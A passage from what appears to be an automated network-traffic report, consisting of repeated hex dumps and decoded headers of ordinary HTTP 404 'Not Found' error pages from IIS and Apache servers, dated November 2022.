65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e b7 fe ce f1 c6 f7 b4 ed ce f3 3c 2f
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Tue, 29 Nov 2022 09:35:11 GMTConnection: closeContent-Length: 1163Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e b7 fe ce f1 c6 f7 b4 ed ce f3 3c 2f
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Tue, 29 Nov 2022 09:35:13 GMTConnection: closeContent-Length: 1163Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e b7 fe ce f1 c6 f7 b4 ed ce f3 3c 2f
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 29 Nov 2022 09:35:21 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 29 Nov 2022 09:35:24 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 626Connection: closeDate: Tue, 29 Nov 2022 09:35:26 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Nov 2022 09:35:42 GMTServer: ApacheContent-Length: 570Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 6e 6f 74 2d 66 6f 75 6e 64 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 73 22 3e 0a 20 20 20 20 20 20 3c 70 3e 34 30 34 3c 62 72 3e 0a 20 20 20 20 20 20 20 3c 73 6d 61 6c 6c 3e 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 73 6d 61 6c 6c 3e 0a 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 62 69 67 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 6d 65 64 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 73 6d 61 6c 6c 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 32 2e 31 2e 33 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Error</title> <link rel="stylesheet" href="/style.css"></head><body><body> <section id="not-found"> <div class="circles"> <p>404<br> <small>PAGE NOT FOUND</small> </p> <span class="circle big"></span> <span class="circle med"></span> <span class="circle small"></span> </div> </section> </body> <script src='//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script><script src="/script.js"></script></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Nov 2022 09:35:45 GMTServer: ApacheContent-Length: 570Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 6e 6f 74 2d 66 6f 75 6e 64 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 73 22 3e 0a 20 20 20 20 20 20 3c 70 3e 34 30 34 3c 62 72 3e 0a 20 20 20 20 20 20 20 3c 73 6d 61 6c 6c 3e 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 73 6d 61 6c 6c 3e 0a 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 62 69 67 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 6d 65 64 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 73 6d 61 6c 6c 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 32 2e 31 2e 33 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Error</title> <link rel="stylesheet" href="/style.css"></head><body><body> <section id="not-found"> <div class="circles"> <p>404<br> <small>PAGE NOT FOUND</small> </p> <span class="circle big"></span> <span class="circle med"></span> <span class="circle small"></span> </div> </section> </body> <script src='//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script><script src="/script.js"></script></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Nov 2022 09:35:47 GMTServer: ApacheContent-Length: 570Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 6e 6f 74 2d 66 6f 75 6e 64 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 73 22 3e 0a 20 20 20 20 20 20 3c 70 3e 34 30 34 3c 62 72 3e 0a 20 20 20 20 20 20 20 3c 73 6d 61 6c 6c 3e 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 73 6d 61 6c 6c 3e 0a 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 62 69 67 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 6d 65 64 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 73 6d 61 6c 6c 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 32 2e 31 2e 33 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 